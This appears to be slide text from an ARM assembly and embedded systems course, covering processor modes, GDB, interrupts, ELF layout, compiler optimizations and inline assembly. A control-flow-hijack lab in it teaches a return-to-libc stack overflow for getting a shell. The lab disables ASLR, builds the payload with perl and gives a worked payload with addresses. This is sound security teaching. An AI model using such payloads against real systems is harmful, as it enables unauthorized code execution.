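#include <stdint.h>

/* Name of the processor mode held in CPSR bits [4:0]. */
static const char *cpsr_mode_name(uint32_t cpsr)
{
    switch (cpsr & 0x1Fu) {
    case 0x10: return "User";
    case 0x11: return "FIQ";
    case 0x12: return "IRQ";
    case 0x13: return "Supervisor";
    case 0x17: return "Abort";
    case 0x1B: return "Undefined";
    case 0x1F: return "System";
    default:   return "unknown";
    }
}

/* I bit (bit 7): 1 means IRQs are disabled. */
static int cpsr_irq_disabled(uint32_t cpsr) { return (int)((cpsr >> 7) & 1u); }

/* F bit (bit 6): 1 means FIQs are disabled. */
static int cpsr_fiq_disabled(uint32_t cpsr) { return (int)((cpsr >> 6) & 1u); }

/* T bit (bit 5): 1 means Thumb state, 0 means ARM state. */
static int cpsr_thumb_state(uint32_t cpsr) { return (int)((cpsr >> 5) & 1u); }
```

For instance, a CPSR of 0x600000D3 decodes to Supervisor mode in ARM state with both IRQs and FIQs disabled.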
Generic ARM Modes
User: normal program execution mode
FIQ: used for handling a high priority (fast) interrupt
IRQ: used for handling a low priority (normal) interrupt
Supervisor: entered on board reset and when a Software Interrupt instruction is executed
Abort: used for handling memory access violations
System: a privileged mode using same registers as User mode
Banked Registers
(Register bank diagram; the mode labels of the columns are not recoverable from the figure)
Full register set: r0 - r10, r11 (FP), r12 (IP), r13 (SP), r14 (LR), r15 (PC), CPSR
One banked set (the FIQ bank on ARM): r8 - r12, r13 (SP), r14 (LR), SPSR
Four further banked sets, each: r13 (SP), r14 (LR), SPSR
Banked registers are preserved across mode changes.
Arm Processor modes
User: normal program execution mode
FIQ: used for handling a high priority (fast) interrupt
IRQ: used for handling a low priority (normal) interrupt
Supervisor: entered on reset and when SWI (software interrupt instruction) is executed
Abort: used for handling memory access violations
Undefined: used for handling undefined instructions
System: a privileged mode that uses the same registers as the User mode
ARMv7 Processor modes (Table B1-1)
Processor mode    Encoding  Privilege Level  Implemented                       Security State   Instruction/Condition (if available)
User        usr   10000     PL0              Always                            Both
FIQ         fiq   10001     PL1              Always                            Both             INTERRUPT
IRQ         irq   10010     PL1              Always                            Both             INTERRUPT
Supervisor  svc   10011     PL1              Always                            Both             SVC/SWI
Monitor     mon   10110     PL1              Security Extensions (TrustZone)   Secure only      SMC/Secure Monitor Call EXCEPTION
Abort       abt   10111     PL1              Always                            Both             Data/Prefetch Abort EXCEPTION
Hyp         hyp   11010     PL2              Virtualization Extensions         Non-secure only  HVC/EXCEPTION
Undefined   und   11011     PL1              Always                            Both             UNDEFINED
System      sys   11111     PL1              Always                            Both
Mode changing instructions
SVC - SuperVisor Call or SWI - SoftWare Interrupt
  Changes mode to Supervisor mode
SMC - Secure Monitor Call
  Changes mode to Secure (with TrustZone)
HVC - Hypervisor Call
  Changes mode to Hypervisor (with hardware virtualization extensions)
Switching modes
Specific instructions for switching between processor modes (SVC/SWI etc.)
HVC (Hypervisor call) only available with specific hardware support
SMC (Secure Monitor call) also only available with specific hardware support (TrustZone)
MOVS PC, LR (copies SPSR to CPSR/APSR)
Linux kernel and other RTOS ("rich featured" OS) run in Supervisor mode generally
Remember the SWI from Hello World?
Special instructions
SUBS PC, LR, <imm>
  Subtracts <imm> value from LR and branches to resulting address
  It also copies SPSR to CPSR
MOVS PC, LR
  Same as above but branches to address in LR and also copies SPSR to CPSR
For use in returning to User/System mode from exception/interrupt modes
How to read/write Status registers
CPSR and APSR value can be saved into register
MSR - Move to Special register from ARM core register
  Example: msr <cpsr/apsr>, <r0>
MRS - Move to ARM core Register from special register
  Example: mrs <r0>, <cpsr/apsr>
SCTLR Register
System Control Register: part of Coprocessor CP15 registers
Allows controlling system wide settings such as:
  Mode (ARM/Thumb) for exceptions
  Base address for exception vector table
Not fully emulated in kvm/qemu
Different for different processor profiles
Controls exception handling configurations
  Whether exceptions should be handled in ARM state or Thumb state
SCTLR Register
These settings are only available on Cortex-R and not on any others
  SCTLR.DZ = 0 means a Divide-by-Zero returns zero result
  SCTLR.DZ = 1 means a Divide-by-Zero generates an undefined instruction exception
  IE bit gives instruction endianness as implemented and is READ ONLY
GNU Debugger (GDB) intro
The GNU debugger is a command line debugging tool
A graphical frontend is also available called ddd
GNU Debugger (GDB) intro
Start gdb using:
  gdb <binary>
Pass initial commands for gdb through a file
  gdb <binary> -x <initfile>
For help
  help
To start running the program
  run or r <argv>
GDB initial commands
One possible set of initial commands:
b main
run
display/10i $pc
display/x $r0
display/x $r1
display/x $r2
display/x $r3
display/x $r4
display/x $r5
display/x $r6
display/x $r7
display/x $r11
display/32xw $sp
display/32xw $cpsr
display/{format string} - prints the expression following the command every time debugger stops

{format string} includes these things:
Count - repeat specified number of {size} elements
Format - format of how whatever is displayed

x (hexadecimal), o (octal), d (decimal), u (unsigned decimal), t (binary), f (float), a (address), i (instruction), c (char) and s (string).

Size letters are b (byte), h (halfword), w (word), g (giant, 8 bytes).

These commands can be entered into the init file, and help to see the values in the registers after executing each statement or set of statements.
GDB Breakpoints
To put breakpoints (stop execution on a certain line)
  b <function name>
  b *<instruction address>
  b <filename:line number>
  b <line number>
To show breakpoints
  info b
To remove breakpoints
  clear <function name>
  clear *<instruction address>
  clear <filename:line number>
  clear <line number>
GDB examining variables/memory
Similar to display, to look at contents of memory
Use "examine" or "x" command
  x/32xw <memory location> to see memory contents at memory location, showing 32 hexadecimal words
  x/3s <memory location> to show 3 strings (null terminated) at a particular memory location
  x/10i <memory location> to show 10 instructions at particular memory location

GDB disassembly & listing things
Can see disassembly if compiled with gdb symbols option in gcc (-ggdb)
  disass <function name>
Can see breakpoints
  info breakpoints
Can see registers
  info reg
GDB stepping
To step one instruction
  stepi or si
To continue till next breakpoint
  continue or c
To see backtrace
  backtrace or bt
Lab 2
Use of gdb and your knowledge of ARM assembly to stop Dr. Evil
  gdb -x <initfile> bomb (Can optionally specify initial commands file using -x)
  b explode_bomb (breakpoint at explode_bomb)
  disass phase_1 (to see phase_1 code)
  info reg to see all registers
Find the right inputs to defuse it
GDB cheat sheet on /home/arm/Desktop
Shift + PgUp to scroll up and Shift + PgDown to scroll down

DAY 2 PART 1
Control Flow operations (Table A4-1)
Instruction        Description                          Meaning
B <label>          Branch to label                      PC = &label
BL <label>         Branch to label with link register   LR = PC+4
                                                        PC = &label
BLX <Rm or #imm>   Branch exchange with link register   LR = & of instr. after BLX instr.
                                                        PC = Rm & 0xFFFFFFFE
                                                        T bit = Rm & 1
BX <Rm or #imm>    Branch exchange                      PC = Rm & 0xFFFFFFFE
                                                        T bit = Rm & 1
Source: http://www.slideshare.net/guest36d1b781/arm-fundamentals
More LDR/STR instructions
LDRB Rd, [Rm] - load byte at memory address in Rm into Rd
STRB Rd, [Rm] - store byte from Rd into memory address in Rm
LDRH Rd, [Rm] - load halfword at memory address in Rm into Rd
STRH Rd, [Rm] - store halfword from Rd into memory address in Rm
LDRSB Rd, [Rm] - load signed byte at memory address in Rm into Rd (sign extend to 32 bits)
LDRSH Rd, [Rm] - load signed half-word at memory address in Rm into Rd (sign extend to 32 bits)
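The difference between the plain and the signed loads is just zero extension versus sign extension, which a short C sketch can show. The helper names are invented for this example, and the casts assume a two's complement target, which holds on ARM.

```c
#include <stdint.h>

/* LDRB: the byte is zero-extended to 32 bits. */
static uint32_t ldrb_value(uint8_t byte)
{
    return (uint32_t)byte;
}

/* LDRSB: the byte is sign-extended to 32 bits. */
static uint32_t ldrsb_value(uint8_t byte)
{
    return (uint32_t)(int32_t)(int8_t)byte;
}

/* LDRSH: the halfword is sign-extended to 32 bits. */
static uint32_t ldrsh_value(uint16_t halfword)
{
    return (uint32_t)(int32_t)(int16_t)halfword;
}
```

So a stored byte of 0x80 reads back as 0x00000080 with LDRB but as 0xFFFFFF80 with LDRSB.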
Other "Misc." instructions - Hints
PLD, PLDW [<reg>, <imm>] - Preload data from memory at address in <reg> with offset of <imm>
PLI [<reg>, <imm>] - Preload instructions from memory
DMB - Data memory barrier ensures order of memory operations
DSB - Data Synchronization barrier ensures completion of memory access operation
ISB - Instruction Synchronization barrier flushes pipeline
More Misc. instructions
SETEND BE/LE - Sets the endianness to Big Endian or Little Endian for memory access (only applies to data)
SRS{DA|DB|IA|IB} - Save Return State saves the LR and SPSR of one mode into the stack pointer of another mode
Is timing important?
Source: http://xkcd.com/612/
PBX-A9 Memory Map
Source: http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.dui0440b/Bbajihec.html
Watchdog timer
Usually used in embedded systems scenarios
A hardware timer that hard resets the system when it reaches zero
Up to system designer to make sure counter does not reach zero
Timer accessible through register
Reset at critical code sections where deadlocks can occur
Source:
http://www.eetimes.com/discussion/beginner-s-corner/4023849/Introduction-to-Watchdog-Timers
Interrupts & Watchdog timers
Is it worth it?
Meant for mainly RTOS
Helps recover from inconsistent state
However system designer has to specify "consistent state"
Source:
http://catless.ncl.ac.uk/Risks/19.49.html
Interrupts introduction
Interrupts
  can be synchronous (software generated)
  can be asynchronous (hardware generated)
  Literally interrupt the control flow of the program
Generated when
  System power off/reset
  Undefined instruction
  Non-aligned memory access
  Non-readable memory access
  Page faults
  ...
Interrupt handlers
Referred to as ISR or Interrupt Service Routine
Use masks in registers to enable/disable interrupts
Section in memory that has addresses to ISRs called an Interrupt Vector table (usually located at 0x00000000)
Wire the handler by writing code directly at location in memory or roll your own lookup table code and insert into vector table
Interrupt Wiring
Exception type                 Mode         Vector Address   Priority
Reset                          Supervisor   0x00000000       1 (highest)
Data Abort                     Abort        0x00000010       2
FIQ (Fast Interrupt)           FIQ          0x0000001C       3
IRQ (Normal Interrupt)         IRQ          0x00000018       4
Prefetch Abort                 Abort        0x0000000C       5
Software Interrupt (SWI/SVC)   Supervisor   0x00000008       6
Undefined instruction          Undefined    0x00000004       6 (lowest)
Interrupt vector table
0x00 RESET
0x04 UNDEFINED
0x08 SWI (entry holds: LDR PC, PC, 100)
0x0C PREFETCH ABORT
0x10 DATA ABORT
0x14 RESERVED
0x18 IRQ
0x1C FIQ
...
0x6C SWI Handler
0x70 SWI Handler Code here...
Current Program Status Register
Bit layout: 31 N | 30 Z | 29 C | 28 V | 27 Q | 26-8 (unlabelled) | 7 I | 6 F | 5 T | 4-0 _MODE
I 1: Disable IRQ mode
F 1: Disable FIQ mode
T 0: ARM state
1: Thumb state
_MODE Mode bits
_Mode [4:0]   Mode
10000         User
10001         FIQ
10010         IRQ
10011         SVC (Supervisor)
10111         Abort
11011         Undefined
11111         System
Interrupt handlers II
When an exception occurs, processor
  Copies CPSR into SPSR_<mode>
  Changes CPSR bits to reflect new mode, and (ARM/Thumb) state
  Disables further interrupts if appropriate
  Stores PC + 4 (ARM) or PC + 2 (Thumb) in LR_<mode>
  Sets PC to address from vector table corresponding to exception
When returning from an ISR
  System developer needs to restore CPSR from SPSR_<mode>
  Restore PC from LR_<mode>
  Both can be done in one instruction MOVS PC, LR
Interrupt handlers III
When IRQ exception occurs, only IRQs are disabled
When FIQ exception occurs, both IRQs and FIQs are disabled
Generally each exception mode's LR has previous PC + 4 (except for Data abort exception)
Data abort exception mode's LR has previous PC + 8 (ARM & Thumb)
Source: http://www.csie.nctu.edu.tw/~wjtsai/EmbeddedSystemDesign/Ch3-1.pdf
Sample IRQ Handler
IRQ_Handler (ARM mode):
SUB lr, lr, #4 @ adjust the return address once, on entry
STMFD sp!, {r0-r12,lr}
BL ISR_IRQ @ Go to second level IRQ handler
LDMFD sp!, {r0-r12,pc}^ @ restore registers and return; ^ copies SPSR to CPSR
Sample FIQ Handler
FIQ Handler
SUB lr, lr, #4 @ adjust the return address once, on entry
STMFD sp!, {r0-r7,lr}
@ Re-enable any interrupts needed here
MRS R0, CPSR
CMP R1, #0x00000012 @ Test for IRQ mode
BICNE R0, R0, #0x80 @ Optionally re-enable IRQs here
@ Handle FIQ event here
LDMFD sp!, {r0-r7,pc}^ @ restore registers and return; ^ copies SPSR to CPSR
SWI (Software Interrupt) handler wiring
Most hardware define vector tables indexed by exception type.
SWI handler address usually at 0x08
As was seen earlier, Linux syscalls use SWI
SWI encoding allows for 24-bit comment, which is generally ignored
Can be used for differentiating b/w types of SWI

SWI handler wiring contd.
SWI 0x18 -> 0x08 LDR PC, PC, 0x100 -> S_Handler
0x108 STMFD sp!, {r0-r12, lr}
0x10c MOV r1, sp
0x110 LDR r0, [lr, #-4]
0x114 BIC r0, r0, #0xff000000
... BL C_SWI_Handler
... LDMFD sp!, {r0-r12, lr}
... MOVS pc, lr


void C_SWI_Handler(int swi_num, ...)
{
switch(swi_num) {
case 0x00: service_SWI1(); break;
case 0x01: service_SWI2(); break;
...
}
}
The address of the instruction after the SWI is stored in LR_<Mode>, so the SWI instruction itself is at [LR, #-4]

The SWI instruction is encoded with the 24-bit value

Mask that 24-bit value into r0
Branch to SWI Handler

Run the appropriate handler based on that value
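The masking step performed by `BIC r0, r0, #0xff000000` can be mirrored in C. This sketch assumes the 32-bit ARM-state SWI/SVC encoding (condition in bits 31:28, 1111 in bits 27:24, the 24-bit number in bits 23:0); the function names are hypothetical.

```c
#include <stdint.h>

/* 1 if the ARM-state instruction word is a SWI/SVC (bits 27:24 are all ones). */
static int is_arm_swi(uint32_t insn)
{
    return ((insn >> 24) & 0xFu) == 0xFu;
}

/* The 24-bit comment field, i.e. the SWI number passed to the C handler. */
static uint32_t swi_number(uint32_t insn)
{
    return insn & 0x00FFFFFFu;
}
```

For `SWI 0x18` with the always condition the instruction word is 0xEF000018, and the extracted number is 0x18.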
Lab 3
Interrupts lab
Emulating a serial driver using UART
In order to see something interesting in this lab, we take the input character and add 1 to it
Modify inter.c and vectors.S files
  Add one or more lines where it says
  /* ADD CODE HERE */
inter.c
void __attribute__((interrupt)) irq_handler() {
/* echo the received character + 1 */
UART0_DR = UART0_DR + 1;
}
vectors.S
reset_handler:
/* set Supervisor stack */
LDR sp, =stack_top
/* copy vector table to address 0 */
BL copy_vectors
/* get Program Status Register */
MRS r0, cpsr
/* go in IRQ mode */
BIC r1, r0, #0x1F
ORR r1, r1, #0x12
MSR cpsr, r1
/* set IRQ stack */
LDR sp, =irq_stack_top
/* Enable IRQs */
BIC r0, r0, #0x80
/* go back in Supervisor mode */
MSR cpsr, r0
/* jump to main */
BL main
B .
Current Program Status Register
Bit layout: 31 N | 30 Z | 29 C | 28 V | 27 Q | 26-8 (unlabelled) | 7 I | 6 F | 5 T | 4-0 _MODE
I 1: Disable IRQ mode
F 1: Disable FIQ mode
T 0: ARM state
1: Thumb state
_MODE Mode bits
_Mode [4:0]   Mode
10000         User
10001         FIQ
10010         IRQ
10011         SVC (Supervisor)
10111         Abort
11011         Undefined
11111         System
ARM ELF Format
ELF Header
.init, .text, .rodata: Read-only Code segment
.data, .bss: Read/write Data segment
.symtab, .rel.text, .rel.data, .debug, .line, .strtab: Symbol table and debugging info NOT loaded into memory
Section header table
ARM ELF Format
.text - has your code
.rodata - has constants and read-only data
.data - has your global and static variables
.bss - contains uninitialized variables
Heap starts after .bss section in memory, grows towards increasing memory
Stack starts at the opposite end and grows toward heap
ARM ELF Format
Section     Description
.text       Program instructions and data
.rodata     Read-only data like format strings for printf
.data       Initialized global data
.bss        Un-initialized global data
.symtab     This section has the symbol information such as global variables and functions
.rel.text   List of locations in the .text that linker needs to determine when combining .o files
.rel.data   Relocation information for global variables
.debug      Debugging information (such as the one turned on with gcc -g)
.line       Mapping b/w line numbers in C program and machine code (debug)
.strtab     String table for symbols in .symtab and .debug
How to perform a control hijack
We can write to the SP given a vulnerable function (strcpy or memcpy with no bounds check into local variable)
ATPCS as we saw requires args to be passed in through R0-R3
For popping a shell we can make a system() call with arguments containing string "/bin/sh"
ARM now executing first instruction in one()
(Stack diagram with an arrow labelled "Increasing Memory")
...
main() frame: Local variables, Caller-save registers, Args to One()
One() frame: Callee-save registers, LR = PCmain
Undefined
Callee-save registers are pushed onto stack using STMFD sp!, {registers} along with R14 (LR)
And R11/R7/R3 (FP) can also be updated relative to (R13) SP
Itzhak Avraham's approach
Use a return to libc style method
We can overwrite LR in stack
Return to a function that contains instructions to pop values from stack into R0 (containing our "/bin/sh" address) and another LR in stack pointing to system()
The above function that contains this code for us is erand48()
Source: https://media.blackhat.com/bh-dc-11/Avraham/BlackHatDC2011Avraham-PoppingAndroidDevices-Slides.pdf
Stack
(Stack diagram with an arrow labelled "Increasing Memory")
Stack slot                  Overwritten with
Buf[3]
Buf[3]
Register val
Callee saved register(s)
LR                          Point to erand48()+x
R0 for system()             R0: Point to /bin/sh
R1                          R1: Can be junk
Junk                        Junk value
&system()                   Point to system()
string                      Put "/bin/sh" string here
erand48()+x:
LDRD R0, R1
SUB SP, 12
POP PC, LR
Lab 4
Control flow hijack lab
  Objective: Get a shell using return to libc style attack
  Itzhak Avraham's paper included
Other useful links:
  http://research.shell-storm.org/files/research-4-en.php
Lab 4 notes
IMPORTANT:
  echo 0 > /proc/sys/kernel/randomize_va_space
In gdb you can breakpoint and run
  p str // Gets address of /bin/sh string
  p erand48 // Gets address of erand48 method
  p system // Gets address of the system method
  Remember to add 1 to the erand48 address (thumb2 instruction set requires LSB to be 1)
To verify run x/s <enter address from previous>
Lab 4 notes contd.
To craft your exploit string run:
  perl -e 'print "ABCD"x3 . "\xAB\xCD\xDE\xEF" . "EFGH"' > solution
  gdb ./boverflow
  "b stage1" or whatever is in your init commands file
  run `cat solution`
Possible Solution
My erand48+x located at 0x76F28E36 + 1
My system located at 0x76F2D768 + 1
My "/bin/sh" passed in through string located at 0x7EFFF6E8
As per the stack diagram I need "ABCD"x3 + 0x378EF276 + 0xE8F6FF7E + "EFGH" + "IJKL" + 0x69D7F276 + "/bin/sh"
DAY 2 PART 1.5
Code Optimization
Ok we can write assembly and C programs
However, do we know what really happens to that C program once we give it to the compiler?
We assume certain things happen for us
For example, dead code is removed
However with great compilers comes great responsibility...
179
GCC Optimizations
Can optimize for code size, memory usage
Usually the compiler knows best, however the result can also be NOT what the system designer has in mind.
We can help the compiler decide
For more evil C, check out
http://www.steike.com/code/useless/evil-c/
void func1(int *a, int *b)
{
    *a += *b;
    *a += *b;
}

void func2(int *a, int *b)
{
    *a += ((*b) << 1);
}
Source: Bryant, R., O'Hallaron, D. "Computer Systems: A Programmer's Perspective"

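Why the compiler cannot simply turn the first form into the second: if both pointers refer to the same int, the two functions give different results. A minimal sketch, with hypothetical names add_twice and add_doubled standing in for the two functions on the slide:

```c
/* Reads *b twice; the first store may change what the second read sees. */
void add_twice(int *a, int *b)
{
    *a += *b;
    *a += *b;
}

/* Reads *b once and adds it doubled. */
void add_doubled(int *a, int *b)
{
    *a += (*b) << 1;
}
```

With distinct variables (x = 1, y = 3) both leave x at 7. With aliased pointers (p = 2, called as f(&p, &p)) add_twice gives 8 and add_doubled gives 6, so the rewrite is only safe when the programmer knows the pointers never alias.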
GCC optimizations 2
Common sub-expression elimination
Dead code removal
  Use of ifdefs helps the compiler eliminate dead code
Induction variables & strength reduction
Loop unrolling
  Increases code size, but reduces the number of branches
Function inlining
  Again can reduce number of branches
  In C code, add inline before function spec
Source: http://gcc.gnu.org/onlinedocs/
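A small sketch of what loop unrolling and inlining look like when written out by hand. The function names are invented for illustration; a compiler may or may not perform the same transformation on its own, depending on the optimization level.

```c
#include <stddef.h>

/* Small helper marked inline so the call can be folded into the loop body. */
static inline int square(int x)
{
    return x * x;
}

/* Straightforward loop: one compare-and-branch per element. */
int sum_squares(const int *v, size_t n)
{
    int sum = 0;
    for (size_t i = 0; i < n; i++)
        sum += square(v[i]);
    return sum;
}

/* Hand-unrolled by four: one compare-and-branch per four elements,
 * at the cost of a larger loop body. */
int sum_squares_unrolled(const int *v, size_t n)
{
    int sum = 0;
    size_t i = 0;
    for (; i + 4 <= n; i += 4) {
        sum += square(v[i]);
        sum += square(v[i + 1]);
        sum += square(v[i + 2]);
        sum += square(v[i + 3]);
    }
    for (; i < n; i++)          /* leftover elements */
        sum += square(v[i]);
    return sum;
}
```

Both functions return the same value; the second trades code size for fewer branches, which is the trade-off named on the slide.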
ARM specific optimizations
Use of constants using barrel shifter:
  Instead of 5x, use (x<<2) + x
Use of conditional execution to reduce code size and execution cycles
Count down loops
  Counting upwards produces ADD, CMP and Bx instructions
  Counting downwards produces SUBS & BGE
Use 32-bit data types as much as possible
Avoid divisions or remainder operation (%)
Register accesses more efficient than memory accesses
  Avoid register spilling (more parameters than registers end up in memory on stack)
Use pure functions when possible and only if they do not have side effects

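The barrel shifter point can be checked with a short C sketch. The function names are hypothetical. On ARM the shifted form can typically be encoded as a single ADD with a shifted operand (for example ADD r0, r0, r0, LSL #2), though what a given compiler emits is not guaranteed. Unsigned arithmetic is used so that overflow wraps in a defined way.

```c
#include <stdint.h>

/* Multiply by 5 with an explicit multiply. */
uint32_t times5_mul(uint32_t x)
{
    return 5u * x;
}

/* Multiply by 5 as a shift plus an add: 4x + x. */
uint32_t times5_shift(uint32_t x)
{
    return (x << 2) + x;
}
```

For example, times5_shift(7) is (7 << 2) + 7 = 28 + 7 = 35.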
ARM specific optimization: Count down loops
Counting up:
int checksum(int *data)
{
    unsigned i;
    int sum = 0;

    for (i = 0; i < 64; i++)
        sum += *data++;

    return sum;
}

    MOV  r2, r0          ; r2 = data
    MOV  r0, #0          ; sum = 0
    MOV  r1, #0          ; i = 0
L1  LDR  r3, [r2], #4    ; r3 = *(data++)
    ADD  r1, r1, #1      ; i = i + 1
    CMP  r1, #0x40       ; compare i with 64
    ADD  r0, r3, r0      ; sum += r3
    BCC  L1              ; if i < 64, goto L1
    MOV  pc, lr          ; return sum

Counting down:
int checksum(int *data)
{
    int i;    /* signed: with an unsigned counter, i >= 0 would always be true */
    int sum = 0;

    for (i = 63; i >= 0; i--)
        sum += *data++;

    return sum;
}

    MOV  r2, r0          ; r2 = data
    MOV  r0, #0          ; sum = 0
    MOV  r1, #0x3f       ; i = 63
L1  LDR  r3, [r2], #4    ; r3 = *(data++)
    ADD  r0, r3, r0      ; sum += r3
    SUBS r1, r1, #1      ; i--, set flags
    BGE  L1              ; if i >= 0, goto L1
    MOV  pc, lr          ; return sum

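A runnable comparison of the two loop shapes, as a sketch with invented function names. One detail worth spelling out: a count-down loop with an unsigned counter has to test i != 0, because i >= 0 is always true for unsigned values and the loop would never end. The i != 0 form is the one that commonly maps to SUBS followed by BNE.

```c
#define CHECKSUM_WORDS 64u

/* Count up: needs an increment, a compare against 64 and a branch. */
int checksum_up(const int *data)
{
    unsigned i;
    int sum = 0;

    for (i = 0; i < CHECKSUM_WORDS; i++)
        sum += *data++;

    return sum;
}

/* Count down to zero: the decrement itself can set the flags,
 * so no separate compare is needed. */
int checksum_down(const int *data)
{
    unsigned i;
    int sum = 0;

    for (i = CHECKSUM_WORDS; i != 0; i--)
        sum += *data++;

    return sum;
}
```

Both functions visit the same 64 words in the same order; only the loop counter runs in the opposite direction.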
ARM specific optimization: 32-bit data types
void t3(void)
{
    char c;
    int x = 0;
    for (c = 0; c < 63; c++)
        x++;
}

void t4(void)
{
    int c;
    int x = 0;
    for (c = 0; c < 63; c++)
        x++;
}

Code for the char counter (t3): the counter has to be truncated back to 8 bits on every iteration
    MOV r0, #0          ; x = 0
    MOV r1, #0          ; c = 0
L1  CMP r1, #0x3f       ; cmp c with 63
    BCS L2              ; if c >= 63, goto L2
    ADD r0, r0, #1      ; x++
    ADD r1, r1, #1      ; c++
    AND r1, r1, #0xff   ; c = (char) r1
    B   L1              ; branch to L1
L2  MOV pc, r14

ARM specific optimization: function calls
int test(int x) {
    return(square(x*x) + square(x*x));
}
int test(int x) {
    return(2*square(x*x));
}
The following case shows square() has a side effect:
int square(int x)
{
    counter++; /* counter is a global variable */
    return(x*x);
}

If no side effect, declare as pure function for compiler to optimize
__pure int square(int x);

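The __pure keyword is, as far as I know, the ARM compiler (armcc) spelling. With GCC, which this class uses, the closest equivalent is the pure function attribute. A minimal sketch under that assumption, with hypothetical test function names:

```c
/* GCC/Clang attribute: the result depends only on the arguments (and
 * possibly on reading globals), and the call has no side effects. */
__attribute__((pure)) int square(int x);

int square(int x)
{
    return x * x;   /* touches no global state */
}

/* Two identical calls: with a pure square() the compiler is allowed
 * to evaluate it once and reuse the result. */
int test_two_calls(int x)
{
    return square(x * x) + square(x * x);
}

/* The hand-optimized form the slide describes. */
int test_one_call(int x)
{
    return 2 * square(x * x);
}
```

Marking a function pure when it does have side effects (such as the counter++ version) is a bug, since calls may silently disappear.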
ARM specific optimization: code alignment
Structure/Code alignment
  12 bytes vs. 8 bytes
  Could use packed keyword to remove padding
  However ARM emulates unaligned load/store by using several aligned byte accesses (inefficient)
struct          /* 12 bytes: padding after a and after d's neighbor c */
{
    char a;
    int b;
    char c;
    short d;
};
struct          /* 8 bytes: members ordered so no padding is needed */
{
    char a;
    char c;
    short d;
    int b;
};

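The 12 versus 8 byte claim can be checked with sizeof and offsetof. This sketch assumes a typical ABI with a 4-byte, 4-byte-aligned int and a 2-byte short (true for the ARM EABI and for common x86 targets); the struct tags are invented for the example.

```c
#include <stddef.h>

/* Members in the original order: 3 bytes of padding after a,
 * 1 byte of padding after c. */
struct padded {
    char a;
    int b;
    char c;
    short d;
};

/* Same members, reordered from smallest to largest alignment. */
struct reordered {
    char a;
    char c;
    short d;
    int b;
};

/* Bytes saved per object by reordering. */
size_t padding_saved(void)
{
    return sizeof(struct padded) - sizeof(struct reordered);
}
```

Reordering keeps every member naturally aligned, so it avoids the slow unaligned accesses that a packed struct would cause.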
Day 2 Part 2

Writing assembly in whatever your editor may be.
Source: http://xkcd.com/378/

Inline assembly (using butterflies)
Follows the following form:
  asm(code : output operand list : input operand list : clobber list);
The input/output operand list includes C and assembly variables
Example:
  /* Rotating bits example */
  asm("mov %[result], %[value], ror #1" : [result] "=r" (y) : [value] "r" (x));
In "=r":
  r is referred to as a constraint
  = is referred to as a modifier
Source: http://www.ethernut.de/en/documents/arm-inline-asm.html

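The rotate example wrapped in a complete function, as a sketch. The function name ror1 and the non-ARM fallback are additions for illustration, so that the same file also builds on a development host; the asm statement itself is the one from the slide.

```c
#include <stdint.h>

/* Rotate a 32-bit value right by one bit. */
uint32_t ror1(uint32_t x)
{
    uint32_t y;
#if defined(__arm__)
    /* [result] is an output bound to y, [value] is an input bound to x. */
    __asm__("mov %[result], %[value], ror #1"
            : [result] "=r" (y)
            : [value] "r" (x));
#else
    /* Portable fallback with the same result, for non-ARM hosts. */
    y = (x >> 1) | (x << 31);
#endif
    return y;
}
```

Rotating 1 right by one bit moves the low bit to the top, giving 0x80000000.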
Possible constraints for inline assembly
Constraint | Usage in ARM state | Usage in Thumb state
f | Floating point registers f0..f7 | Not available
h | Not available | Registers r8..r15
G | Immediate floating point constant | Not available
H | Same as G, but negated | Not available
I | Immediate value in data processing instructions, e.g. ORR R0, R0, #operand | Constant in the range 0 .. 255, e.g. SWI operand
J | Indexing constants -4095 .. 4095, e.g. LDR R1, [PC, #operand] | Constant in the range -255 .. -1, e.g. SUB R0, R0, #operand
K | Same as I, but inverted | Same as I, but shifted
L | Same as I, but negated | Constant in the range -7 .. 7, e.g. SUB R0, R1, #operand
l | Same as r | Registers r0..r7, e.g. PUSH operand
M | Constant in the range of 0 .. 32 or a power of 2, e.g. MOV R2, R1, ROR #operand | Constant that is a multiple of 4 in the range of 0 .. 1020, e.g. ADD R0, SP, #operand
m | Any valid memory address | Any valid memory address
N | Not available | Constant in the range of 0 .. 31, e.g. LSL R0, R1, #operand
O | Not available | Constant that is a multiple of 4 in the range of -508 .. 508, e.g. ADD SP, #operand
r | General register r0 .. r15, e.g. SUB operand1, operand2, operand3 | Not available
w | Vector floating point registers s0 .. s31 | Not available
X | Any operand | Any operand
Source: http://www.ethernut.de/en/documents/arm-inline-asm.html

Modifiers
= is write-only operand, usually for all output operands
+ is read-write operand, must be listed as an output operand
& is a register that should be used for output only
Source: http://www.ethernut.de/en/documents/arm-inline-asm.html

Example 6.c
0000838c <main>:
    838c: b590       push  {r4, r7, lr}
    838e: b085       sub   sp, #20
    8390: af00       add   r7, sp, #0
    8392: f04f 0306  mov.w r3, #6
    8396: 60fb       str   r3, [r7, #12]
    8398: f3ef 8400  mrs   r4, CPSR
    839c: 60bc       str   r4, [r7, #8]
    839e: 68fa       ldr   r2, [r7, #12]
    83a0: f243 535d  movw  r3, #13661 ; 0x355d
    83a4: f6cf 73fd  movt  r3, #65533 ; 0xfffd
    83a8: 18d3       adds  r3, r2, r3
    83aa: 607b       str   r3, [r7, #4]
    83ac: f3ef 8400  mrs   r4, CPSR
    83b0: 603c       str   r4, [r7, #0]
    83b2: f248 4344  movw  r3, #33860 ; 0x8444
    83b6: f2c0 0300  movt  r3, #0
    83ba: 4618       mov   r0, r3
    83bc: 6879       ldr   r1, [r7, #4]
    ...

#include <stdio.h>

int main(void)
{
    int a, b;
    int x, y;    /* APSR snapshots before and after the subtraction */
    a = 6;
    asm("mrs %[result], apsr" : [result] "=r" (x) : );
    b = a - 182947;
    asm("mrs %[result], apsr" : [result] "=r" (y) : );
    printf("a's negatory is %d\n", b);

    return 0;
}

Before the subtraction operation
  APSR = 0x60000010
After the subtraction operation
  APSR = 0x80000010

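To read the two APSR values: the condition flags sit in the top four bits, N (bit 31), Z (bit 30), C (bit 29) and V (bit 28). A small decoding sketch, with a struct and function name made up for the example:

```c
#include <stdint.h>

/* One field per condition flag, each 0 or 1. */
struct apsr_flags {
    unsigned n;   /* negative */
    unsigned z;   /* zero */
    unsigned c;   /* carry */
    unsigned v;   /* overflow */
};

/* Extract the NZCV flags from a raw APSR/CPSR value. */
struct apsr_flags decode_apsr(uint32_t apsr)
{
    struct apsr_flags f;
    f.n = (apsr >> 31) & 1u;
    f.z = (apsr >> 30) & 1u;
    f.c = (apsr >> 29) & 1u;
    f.v = (apsr >> 28) & 1u;
    return f;
}
```

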